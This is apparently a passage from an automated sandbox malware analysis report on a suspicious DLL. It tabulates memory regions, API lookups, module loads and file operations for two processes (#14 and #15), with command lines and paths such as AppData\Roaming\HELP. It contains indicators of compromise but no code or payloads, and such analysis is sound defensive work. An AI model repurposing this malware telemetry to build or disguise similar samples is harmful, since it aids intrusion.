| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd6000 | 0x7ffd6000 | 0x7ffd6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:24 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 94583 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #14: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllRegisterServer /fn_args="0" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:31, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:58 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xaf8 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AFC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x001effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0037ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x0044ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00517fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000520000 | 0x00520000 | 0x00620fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x0080ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x006fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000800000 | 0x00800000 | 0x0080ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd7000 | 0x7ffd7000 | 0x7ffd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:25 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 94723 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #15: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllUnregisterServer /fn_args="0" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:31, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:58 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb04 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B08
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00170000 | 0x001d6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0032ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000330000 | 0x00330000 | 0x003f7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000420000 | 0x00420000 | 0x0042ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x00530fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x0113ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x013cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0131ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000013c0000 | 0x013c0000 | 0x013cffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
